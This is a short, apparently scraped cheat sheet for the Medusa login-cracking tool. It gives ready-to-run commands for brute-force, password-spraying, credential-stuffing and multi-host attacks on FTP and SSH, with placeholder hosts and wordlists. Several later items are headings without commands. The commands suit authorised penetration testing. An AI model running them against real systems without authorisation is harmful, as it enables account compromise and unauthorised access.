Medusa
Usage
1) Brute-force attack
medusa -h IP -u USER -P WORDLISTPASS.txt -M ftp2) Password Spraying
medusa -h IP -U WORDLISTUSERS.txt -p PASSWORD -M ftp3) Credential Stuffing
medusa -h IP -U WORDLISTUSERS.txt -P WORDLISTPASS.txt -M ftp4) Attack on multiple hosts
medusa -H HOSTS.txt -U USERS.txt -P PASSWORDS.txt -M ftp5) Attack a specific port than default
medusa -h IP -u USER -P WORDLISTPASS.txt -M ssh (Default port 22)
medusa -h IP -u USER -P WORDLISTPASS.txt -M ssh -n 2222 (Attack port 2222)6) Check for null "" password and Same as Username password
7) Save logs in a file
8) Stop on Success
9) Combo entries
10) Module usage information
Last updated